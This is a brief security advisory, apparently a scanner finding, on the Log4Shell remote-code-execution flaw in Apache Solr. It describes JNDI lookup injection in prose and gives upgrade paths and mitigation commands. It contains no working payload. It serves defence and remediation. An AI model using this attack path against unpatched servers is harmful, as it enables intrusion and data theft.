Apache Solr Log4Shell RCE
Description
Apache Solr versions using vulnerable Log4j library (CVE-2021-44228, also known as Log4Shell) allow remote code execution through specially crafted input. Attackers can exploit this critical vulnerability by injecting malicious JNDI lookup strings that cause the application to execute arbitrary code or exfiltrate sensitive data without requiring authentication.
Remediation
Take the following steps immediately to remediate this vulnerability:
1. Upgrade Apache Solr to version 8.11.1 or later (for 8.x branch) or 7.7.3 or later (for 7.x branch), which include patched Log4j versions
2. If immediate upgrade is not possible, apply one of these temporary mitigations:
- Set the JVM option
-Dlog4j2.formatMsgNoLookups=true
- Remove the JndiLookup class from the Log4j JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
3. Verify the fix by checking Solr and Log4j versions after applying updates
4. Review logs for suspicious activity or exploitation attempts prior to patching
5. Implement network segmentation to limit exposure of Solr instances to untrusted networks